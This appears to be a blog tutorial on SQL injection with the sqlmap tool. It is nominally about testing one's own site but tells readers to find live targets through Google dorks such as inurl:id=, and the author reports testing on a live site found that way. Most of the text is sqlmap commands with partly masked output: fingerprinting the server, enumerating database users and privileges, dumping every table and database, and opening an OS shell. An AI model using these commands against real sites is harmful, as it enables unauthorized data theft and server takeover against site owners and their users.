Sql Injection using Sqlmap

Trying out Sql Injection is important when you want to see if your site is vulnerable. My opinion is trying all the popular script there's in the web so you can see from the point of view of the attacker. I tried this so all my website can be protected from sql injection.

First you need to find a target, just try to find in google inurl:id= or try looking around in Google dorks well make sure you have the permission of the owner of the website. or if you have a local webserver you might test it there but for me somehow I couldn't test it on my local so had find live one.

sqlmap.py -u about.php?id=1 -f
web application technology: Apache 2.4.9, PHP 5.2.17
back-end DBMS: active fingerprint: MySQL >= 5.5.0

Perform an extensive DBMS version fingerprint

sqlmap.py -u about.php?id=1 -b
back-end DBMS: MySQL 5
banner: '5.5.35'

Try to find current user of the database

sqlmap.py -uabout.php?id=1 –-current-user
current user: '****'

Try to find the hostname of the webserver

sqlmap.py -u about.php?id=1 –-hostname
hostname: '****.**.*****'

Try to find the name of the current database

sqlmap.py -u about.php?id=1 –-current-db
current database: '*****-******'

Try to enumerate all the users of the database

sqlmap.py -u about.php?id=1 --users
database management system users [1]
[*] '**********'@'%'

To see privileges of these users.

sqlmap.py -u about.php?id=1 --privileges

To see roles of the DBMS users.

sqlmap.py -u about.php?id=1 --roles

To see all the databases.

sqlmap.py -u about.php?id=1 --dbs

To get the list of all tables.

sqlmap.py -u about.php?id=1 --tables

To get list of all the columns.

 sqlmap.py -u about.php?id=1 –-columns

To dump all the entries in the tables from current database.

sqlmap.py -u about.php?id=1 --dump

To dump the fields of all the databases.

sqlmap.py -u about.php?id=1 –dump-all

To get shell access using sqlmap.

sqlmap.py -u about.php?id=1 –os-shell

Subscribe to You Live What You Learn

Don’t miss out on the latest issues. Sign up now to get access to the library of members-only issues.
[email protected]